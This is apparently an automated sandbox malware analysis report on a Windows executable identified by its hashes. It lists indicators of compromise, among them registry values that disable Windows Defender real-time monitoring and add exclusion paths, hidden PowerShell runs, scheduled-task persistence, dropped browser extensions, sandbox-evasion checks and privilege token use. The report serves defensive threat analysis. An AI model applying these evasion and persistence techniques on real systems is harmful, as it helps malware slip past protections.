Analysis
-
max time kernel
93s -
max time network
94s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system -
submitted
30/05/2024, 19:28
Static task
static1
Behavioral task
behavioral1
Sample
1cf4a727049f058512438e8664b50e63dc3909c574e67eeb418ae11f38c08ace.exe
Resource
win7-20240419-en
General
-
Target
1cf4a727049f058512438e8664b50e63dc3909c574e67eeb418ae11f38c08ace.exe
-
Size
7.2MB
-
MD5
0f2058d366f7f2432e3397849afd8b21
-
SHA1
d30acb6c954eb3039d6f2a0373890058fb255a07
-
SHA256
1cf4a727049f058512438e8664b50e63dc3909c574e67eeb418ae11f38c08ace
-
SHA512
a92d6ca514912bf2708f15218e36e01a94c783410828f326e59aa49aea7e3a16a5843cfacc58f1b8871f7523c970c6995e41a58852e3dae65d2afb89b9292b12
-
SSDEEP
196608:91Oa9rQIur8l4D6pMfOSNhchW3woWCpEFwxI:3Oav0On0hGWAoDp0eI
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\AqxqdgaLLZTMdtrEC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\xWvzdveufkqfSjMY = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\rHfQGqiujvxkYJuQWHR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\xWvzdveufkqfSjMY = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\FtTPlVLhSaUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\mpUBPkkqU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OOuPExCnaYTU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\xWvzdveufkqfSjMY = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\mpUBPkkqU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\tQtOyvtwIjTyC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\tQtOyvtwIjTyC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\AqxqdgaLLZTMdtrEC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OOuPExCnaYTU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\rHfQGqiujvxkYJuQWHR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\FtTPlVLhSaUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\HNIqBcslfBUMDlVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\xWvzdveufkqfSjMY = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\HNIqBcslfBUMDlVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 24 2384 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell and hide display window.
pid Process 2528 powershell.exe 2864 powershell.exe 1504 powershell.EXE 2724 powershell.EXE 1248 powershell.exe 1500 powershell.EXE 2548 powershell.exe 1016 powershell.exe 2384 powershell.exe 1712 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Control Panel\International\Geo\Nation lFVhvJd.exe -
Executes dropped EXE 4 IoCs
pid Process 3024 Install.exe 2684 Install.exe 2768 vXXWSIg.exe 2056 lFVhvJd.exe -
Loads dropped DLL 23 IoCs
pid Process 2944 1cf4a727049f058512438e8664b50e63dc3909c574e67eeb418ae11f38c08ace.exe 3024 Install.exe 3024 Install.exe 3024 Install.exe 3024 Install.exe 2684 Install.exe 2684 Install.exe 2684 Install.exe 1756 WerFault.exe 1756 WerFault.exe 1756 WerFault.exe 2156 WerFault.exe 2156 WerFault.exe 2156 WerFault.exe 2156 WerFault.exe 2384 rundll32.exe 2384 rundll32.exe 2384 rundll32.exe 2384 rundll32.exe 2156 WerFault.exe 2420 WerFault.exe 2420 WerFault.exe 2420 WerFault.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json lFVhvJd.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json lFVhvJd.exe -
Drops file in System32 directory 27 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326 lFVhvJd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4 lFVhvJd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686 lFVhvJd.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA lFVhvJd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA lFVhvJd.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA lFVhvJd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686 lFVhvJd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4 lFVhvJd.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA lFVhvJd.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol lFVhvJd.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat lFVhvJd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326 lFVhvJd.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol vXXWSIg.exe File created C:\Windows\system32\GroupPolicy\gpt.ini vXXWSIg.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol vXXWSIg.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini vXXWSIg.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\OOuPExCnaYTU2\VVSomzdrlYgzA.dll lFVhvJd.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak lFVhvJd.exe File created C:\Program Files (x86)\OOuPExCnaYTU2\saHZAgb.xml lFVhvJd.exe File created C:\Program Files (x86)\tQtOyvtwIjTyC\JymsBCD.dll lFVhvJd.exe File created C:\Program Files (x86)\FtTPlVLhSaUn\LozjVgz.dll lFVhvJd.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi lFVhvJd.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja lFVhvJd.exe File created C:\Program Files (x86)\rHfQGqiujvxkYJuQWHR\DzPXiiZ.dll lFVhvJd.exe File created C:\Program Files (x86)\mpUBPkkqU\VozrYz.dll lFVhvJd.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi lFVhvJd.exe File created C:\Program Files (x86)\mpUBPkkqU\AsvKbsK.xml lFVhvJd.exe File created C:\Program Files (x86)\rHfQGqiujvxkYJuQWHR\ksWCxtc.xml lFVhvJd.exe File created C:\Program Files (x86)\tQtOyvtwIjTyC\rbmjKrt.xml lFVhvJd.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\WDtolTrtWazUMxY.job schtasks.exe File created C:\Windows\Tasks\ffSBZYZjRJDDYrjLt.job schtasks.exe File created C:\Windows\Tasks\bLzeoVMxrLqUlFeJJd.job schtasks.exe File created C:\Windows\Tasks\gcaOKtldTodyQokzi.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 1756 2768 WerFault.exe 62 2156 2684 WerFault.exe 29 2420 2056 WerFault.exe 227 -
Creates scheduled task(s) 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1420 schtasks.exe 264 schtasks.exe 780 schtasks.exe 1576 schtasks.exe 2816 schtasks.exe 540 schtasks.exe 2136 schtasks.exe 1772 schtasks.exe 484 schtasks.exe 740 schtasks.exe 1504 schtasks.exe 2316 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople lFVhvJd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{7F15AAE7-4121-4599-B42B-A705620238FD}\WpadDecisionTime = 60d56fc2c7b2da01 lFVhvJd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA lFVhvJd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs lFVhvJd.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00db000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\7e-0a-eb-d5-dc-fb\WpadDecisionTime = 60d56fc2c7b2da01 lFVhvJd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates lFVhvJd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ lFVhvJd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs lFVhvJd.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 lFVhvJd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\7e-0a-eb-d5-dc-fb\WpadDecisionReason = "1" lFVhvJd.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\7e-0a-eb-d5-dc-fb\WpadDecision = "0" lFVhvJd.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates lFVhvJd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs lFVhvJd.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{7F15AAE7-4121-4599-B42B-A705620238FD}\WpadNetworkName = "Network 3" lFVhvJd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs lFVhvJd.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000004000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00db000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs lFVhvJd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings lFVhvJd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ vXXWSIg.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" vXXWSIg.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" lFVhvJd.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" lFVhvJd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs lFVhvJd.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{7F15AAE7-4121-4599-B42B-A705620238FD}\WpadDecisionReason = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings lFVhvJd.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{7F15AAE7-4121-4599-B42B-A705620238FD}\WpadDecisionReason = "1" lFVhvJd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My lFVhvJd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs lFVhvJd.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates lFVhvJd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing lFVhvJd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates lFVhvJd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs lFVhvJd.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\7e-0a-eb-d5-dc-fb\WpadDecisionTime = 60d56fc2c7b2da01 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates lFVhvJd.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections lFVhvJd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA lFVhvJd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs lFVhvJd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates lFVhvJd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{7F15AAE7-4121-4599-B42B-A705620238FD}\7e-0a-eb-d5-dc-fb lFVhvJd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root lFVhvJd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust lFVhvJd.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\7e-0a-eb-d5-dc-fb\WpadDecision = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates lFVhvJd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs lFVhvJd.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs lFVhvJd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{7F15AAE7-4121-4599-B42B-A705620238FD} rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot lFVhvJd.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{7F15AAE7-4121-4599-B42B-A705620238FD}\WpadDecisionTime = 20ea78c6c7b2da01 rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\7e-0a-eb-d5-dc-fb\WpadDecisionTime = 20ea78c6c7b2da01 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe -
Suspicious behavior: EnumeratesProcesses 39 IoCs
pid Process 2528 powershell.exe 2528 powershell.exe 2528 powershell.exe 2864 powershell.exe 1248 powershell.exe 1248 powershell.exe 1248 powershell.exe 1504 powershell.EXE 1504 powershell.EXE 1504 powershell.EXE 1500 powershell.EXE 1500 powershell.EXE 1500 powershell.EXE 2548 powershell.exe 2724 powershell.EXE 2724 powershell.EXE 2724 powershell.EXE 1016 powershell.exe 1016 powershell.exe 1016 powershell.exe 2056 lFVhvJd.exe 2056 lFVhvJd.exe 2056 lFVhvJd.exe 2056 lFVhvJd.exe 2056 lFVhvJd.exe 2056 lFVhvJd.exe 2056 lFVhvJd.exe 2056 lFVhvJd.exe 2384 powershell.exe 1712 powershell.exe 2056 lFVhvJd.exe 2056 lFVhvJd.exe 2056 lFVhvJd.exe 2056 lFVhvJd.exe 2056 lFVhvJd.exe 2056 lFVhvJd.exe 2056 lFVhvJd.exe 2056 lFVhvJd.exe 2056 lFVhvJd.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2528 powershell.exe Token: SeDebugPrivilege 2864 powershell.exe Token: SeIncreaseQuotaPrivilege 824 WMIC.exe Token: SeSecurityPrivilege 824 WMIC.exe Token: SeTakeOwnershipPrivilege 824 WMIC.exe Token: SeLoadDriverPrivilege 824 WMIC.exe Token: SeSystemProfilePrivilege 824 WMIC.exe Token: SeSystemtimePrivilege 824 WMIC.exe Token: SeProfSingleProcessPrivilege 824 WMIC.exe Token: SeIncBasePriorityPrivilege 824 WMIC.exe Token: SeCreatePagefilePrivilege 824 WMIC.exe Token: SeBackupPrivilege 824 WMIC.exe Token: SeRestorePrivilege 824 WMIC.exe Token: SeShutdownPrivilege 824 WMIC.exe Token: SeDebugPrivilege 824 WMIC.exe Token: SeSystemEnvironmentPrivilege 824 WMIC.exe Token: SeRemoteShutdownPrivilege 824 WMIC.exe Token: SeUndockPrivilege 824 WMIC.exe Token: SeManageVolumePrivilege 824 WMIC.exe Token: 33 824 WMIC.exe Token: 34 824 WMIC.exe Token: 35 824 WMIC.exe Token: SeDebugPrivilege 1248 powershell.exe Token: SeDebugPrivilege 1504 powershell.EXE Token: SeDebugPrivilege 1500 powershell.EXE Token: SeDebugPrivilege 2548 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2880 WMIC.exe Token: SeIncreaseQuotaPrivilege 2880 WMIC.exe Token: SeSecurityPrivilege 2880 WMIC.exe Token: SeTakeOwnershipPrivilege 2880 WMIC.exe Token: SeLoadDriverPrivilege 2880 WMIC.exe Token: SeSystemtimePrivilege 2880 